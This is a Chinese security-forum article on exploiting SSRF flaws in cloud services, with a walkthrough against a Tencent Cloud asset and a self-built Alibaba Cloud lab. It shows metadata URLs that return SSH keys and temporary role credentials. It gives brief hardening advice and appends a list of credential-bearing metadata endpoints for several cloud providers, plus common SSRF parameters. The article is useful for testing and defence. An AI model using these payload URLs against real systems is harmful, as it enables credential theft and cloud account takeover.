问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
云上的ssrf利用
渗透测试
由于云厂商提供云服务均使用同一套网络边界和鉴权系统,且各云组件默认相互信任。此时一旦存在SSRF漏洞,此类边界将不复存在,攻击者可直接调用云厂商支持环境中的相应接口,因此SSRF漏洞在云环境中更具有危害性。以下文章围绕ssrf的云上利用展开。
前言: --- 由于云厂商提供云服务均使用同一套网络边界和鉴权系统,且各云组件默认相互信任。此时一旦存在SSRF漏洞,此类边界将不复存在,攻击者可直接调用云厂商支持环境中的相应接口,因此SSRF漏洞在云环境中更具有危害性。以下文章围绕ssrf的云上利用展开。 0X01 漏洞概述: ---------- SSRF全称:Server-Side Request Forgery,即服务器端请求伪造。 攻击者可以利用该漏洞使服务器端向攻击者构造的任意域发出请求,目标通常是从外网无法访问的内部系统。SSRF 形成的原因大都是由于服务端提供了对外发起请求的功能且没有对目标地址做过滤与限制。 由于元数据服务部署在链路本地地址上,云厂商并没有进一步设置安全措施来检测或阻止由实例内部发出的恶意的对元数据服务的未授权访问。攻击者可以通过实例上应用的SSRF漏洞对实例的元数据服务进行访问。因此,如果实例应用中存在SSRF漏洞,那么元数据服务将会完全暴露在攻击者面前。 0X02 漏洞危害: ---------- 在云服务ssrf利用中: 1、攻击元数据服务:云环境中,云数据即表示实例,可以用来查看、配置甚至管理正在运行中的实例。 2、攻击存储桶:攻击者通过访问元数据中存储的临时秘钥或者用于自启动实例的启动脚本,这些脚本可能会包含AK、密码、源码等等,然后根据从元数据服务获取的信息,攻击者可尝试获取到受害者账户下COS、CVM、集群等服务的权限。 3、攻击Kubelet API:在云环境中,可通过Kubelet API查询集群pod和node的信息,也可通过其执行命令。(Kubernetes API 用于与集群及其各种资源进行交互。有不同的资源类型和资源实例,以API对象的形式存在。是集群的一部分,API 会指导它们在必要时执行特定操作。) 4、越权攻击云平台内其他组件或服务:由于云上各组件相互信任,当云平台内某个组件或服务存在SSRF漏洞时,就可通过此漏洞越权攻击其他组件或者服务。 0X03 漏洞实例—Ssrf读取腾讯云元数据 ---------------------- 在一次ssrf漏洞挖掘过程中,偶然发现该资产对应的服务器为腾讯云服务器,进一步利用尝试读取云上元数据。 功能点在同步头像位置,发包中有url参数,尝试判断是否存在ssrf漏洞,将url参数改为百度,发现会返回一张图片访问链接: ![](https://shs3.b.qianxin.com/butian_public/f9735106c04e185b9277ab7f8d202c4d7d5fcc5171a73.jpg) 访问发现返回的图片,内容显示为百度,判断出网。 ![](https://shs3.b.qianxin.com/butian_public/f265564e43d2f8e370fb9ae9518674d93ab5cd8f43fbc.jpg) 意味着这里会加载来自云上的图像,后查看响应发现:sever:Tencent-ci,判断为腾讯云服务器。下面开始进一步利用尝试读取元数据: 将ssrf位置更换为腾讯云元数据地址:<http://metadata.tencentyun.com/latest/meta-data/> ![](https://shs3.b.qianxin.com/butian_public/f466079f24e300e9b542a193dc16a24b1b03d8f98d8f8.jpg) 获取meta-data列: ![](https://shs3.b.qianxin.com/butian_public/f5725284b70ce04cbde0b0011a5837cc8600b492fd6a0.jpg) 看到响应返回目录:public-keys/,构造链接进一步获取ssh\_rsa: <http://metadata.tencentyun.com/latest/meta-data/public-keys/0/openssh-key/> ![](https://shs3.b.qianxin.com/butian_public/f2625609e8b4f9d9205f6b7285178a481e39add49ebe4.jpg) ![](https://shs3.b.qianxin.com/butian_public/f427799d03b3897c3037b3b03d6b7669324dcab2b9ff7.jpg) 在腾讯云中还可以利用ssrf读取如下数据: 1、获取实例物理所在地信息。 <http://metadata.tencentyun.com/latest/meta-data/placement/region> ![](https://shs3.b.qianxin.com/butian_public/f934081435a063dfe864b9e1dd048a9d793e56e4e6794.jpg) 2、获取实例内⽹ IP。实例存在多张⽹卡时,返回 eth0 设备的⽹络地址。 <http://metadata.tencentyun.com/latest/meta-data/local-ipv4> ![](https://shs3.b.qianxin.com/butian_public/f6659620931978b397557dc958bdddc2cb7c555ebec27.jpg) 3、获取实例公⽹ IP <http://metadata.tencentyun.com/latest/meta-data/public-ipv4> ![](https://shs3.b.qianxin.com/butian_public/f39598983601b8fd0a9a8d4586442fde74fb77bea2a55.jpg) 4、获取实例网络接口 VPC 网络 ID。 [http://metadata.tencentyun.com/network/interfaces/macs/${mac}/vpc-id](http://metadata.tencentyun.com/network/interfaces/macs/$%7Bmac%7D/vpc-id) ![](https://shs3.b.qianxin.com/butian_public/f6404350d6b402b4a4e34f6650a352bcaa8a8336d8d83.jpg) 5、在获取到⻆⾊名称后,可以通过以下链接取⻆⾊的临时凭证,${role-name} 为 CAM 角⾊的名称: [http://metadata.tencentyun.com/latest/meta-data/cam/security-credentials/${rolename}](http://metadata.tencentyun.com/latest/meta-data/cam/security-credentials/$%7Brolename%7D) ![](https://shs3.b.qianxin.com/butian_public/f606276e13359e8a07d71c11e88837512bf7ea5689ba9.jpg) ssrf读取阿里云元数据 ------------ 这里是使用自己搭建的ssrf靶场环境后进行利用举例。 ![](https://shs3.b.qianxin.com/butian_public/f14739018e15ff5039b48fd93e11ba67303a66bb8afc9.jpg) 访问元数据:<http://100.100.100.200/latest/meta-data> ![](https://shs3.b.qianxin.com/butian_public/f577691dde38a5cceda7cc073ff6831960eb68d3017d7.jpg) 在返回的结果中,可以看到当前环境存在 ram/ 目录 ![](https://shs3.b.qianxin.com/butian_public/f970043c5721ed92aafec25764290fcaf6dd400a8f7d8.jpg) 说明当前云服务器配置了 RAM 角色,可以进一步获取到临时凭证。获得RAM角色的临时身份凭证,使用该安全令牌就能以RAM角色身份访问被授权的资源。 访问RAM 角色的临时凭证,获取AK SK信息: <http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorp-terraform-goat-role> ![](https://shs3.b.qianxin.com/butian_public/f708244c7821f0d35c1bc372a318c71dd8e0f4178b050.jpg) 拿到凭证意味着可以接管云服务。 ![](https://shs3.b.qianxin.com/butian_public/f7135140e147800598238df2c38f53f42408c6bdb364a.jpg)不仅可以接管云主机,对云主机进行配置还可以执行命令,这里不再赘述。 0X04 防御与加固 ---------- 云上ssrf ------ 加固模式:加固模式下,实例基于token鉴权查看实例元数据,相比普通模式对SSRF攻击有更好的防范效果。 普通模式:限制用户RAM角色权限,只赋予自己所需要的权限,这样可以将影响程度降到最低。 0X05 拓展 ------- ### 一、常见元数据地址 **1、AWS(** [**http://169.254.169.254/latest/meta-data/**](http://169.254.169.254/latest/meta-data/)**)** <http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories> <http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy> <http://169.254.169.254/latest/user-data> [http://169.254.169.254/latest/user-data/iam/security-credentials/\[ROLE](http://169.254.169.254/latest/user-data/iam/security-credentials/%5BROLE) NAME\] [http://169.254.169.254/latest/meta-data/iam/security-credentials/\[ROLE](http://169.254.169.254/latest/meta-data/iam/security-credentials/%5BROLE) NAME\] <http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key> [http://169.254.169.254/latest/meta-data/public-keys/\[ID\]/openssh-key](http://169.254.169.254/latest/meta-data/public-keys/%5BID%5D/openssh-key) **2、Google Cloud(** [**http://metadata/computeMetadata/v1/**](http://metadata/computeMetadata/v1/) \*\*) <https://cloud.google.com/compute/docs/metadata> ```php Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" on API v1 ``` <http://169.254.169.254/computeMetadata/v1/> <http://metadata.google.internal/computeMetadata/v1/> <http://metadata/computeMetadata/v1/> <http://metadata.google.internal/computeMetadata/v1/instance/hostname> <http://metadata.google.internal/computeMetadata/v1/instance/id> <http://metadata.google.internal/computeMetadata/v1/project/project-id> **3、Azure(** [**http://169.254.169.254/metadata/instance?api-version=2017-04-02**](http://169.254.169.254/metadata/instance?api-version=2017-04-02)**)** <https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service> ```php Header: "Metadata: true" ``` (Old) <https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/> <http://169.254.169.254/metadata/instance?api-version=2017-04-02> [http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text](http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text) **4、Oracle Cloud(** [**http://169.254.169.254/opc/v1/instance/**](http://169.254.169.254/opc/v1/instance/)**)** <https://docs.us-phoenix-1.oraclecloud.com/Content/Compute/Tasks/gettingmetadata.htm> <http://169.254.169.254/opc/v1/instance/> <https://docs.oracle.com/en/cloud/iaas/compute-iaas-cloud/stcsg/retrieving-instance-metadata.html> <http://192.0.0.192/latest/> <http://192.0.0.192/latest/user-data/> <http://192.0.0.192/latest/meta-data/> <http://192.0.0.192/latest/attributes/> **5、阿里云(** [**http://100.100.100.200/latest/meta-data/**](http://100.100.100.200/latest/meta-data/)**)** <https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadata> [http://100.100.100.200/latest/meta-data/\[metadata\](http://100.100.100.200/latest/meta-data/%3cmetadata)](metadata%5D(http%3A//100.100.100.200/latest/meta-data/%3Cmetadata)) <http://100.100.100.200/latest/meta-data/instance-id> <http://100.100.100.200/latest/meta-data/ram/security-credentials/> <http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorp-terraform-goat-role> **6、腾讯云(** [**http://metadata.tencentyun.com/latest/meta-data/**](http://metadata.tencentyun.com/latest/meta-data/)**)** <https://cloud.tencent.com/document/product/213/4934> <http://metadata.tencentyun.com/latest/meta-data/> <http://169.254.0.23/latest/meta-data/> <http://100.88.222.5/> **7、华为云(** [**http://169.254.169.254**](http://169.254.169.254/)**)** [https://support.huaweicloud.com/usermanual-ecs/ecs\_03\_0166.html](https://support.huaweicloud.com/usermanual-ecs/ecs_03_0166.html) [http://169.254.169.254/openstack/latest/meta\_data.json](http://169.254.169.254/openstack/latest/meta_data.json) [http://169.254.169.254/openstack/latest/user\_data](http://169.254.169.254/openstack/latest/user_data) [http://169.254.169.254/openstack/latest/network\_data.json](http://169.254.169.254/openstack/latest/network_data.json) <http://169.254.169.254/openstack/latest/securitykey> #### 二、ssrf挖掘常见场景、参数 ##### 常见场景: 1、通过URL地址进行网页分享; <http://share.xxx.com/index.php?url=http://www.xxx.com> 2、转码服务,通过URL地址把原地址的网页转换格式 3、图片加载与下载,一般是通过url参数进行图片获取 <http://image.xxx.com/image.php?image=http://www.xxx.com> 4、未公开的api实现以及其他调用url的功能; 5、设备后台管理进行存活测试; 6、远程资源调用功能; 7、数据库内置功能; 8、编辑器进行远程图片抓取,如: ueditor; 9、打包附件或者内容编辑并导出时 10、PDF生成或导出 ##### 常见参数: share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain...
发表于 2023-08-23 09:00:01
阅读 ( 9137 )
分类:
渗透测试
5 推荐
收藏
0 条评论
请先
登录
后评论
中铁13层打工人
72 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!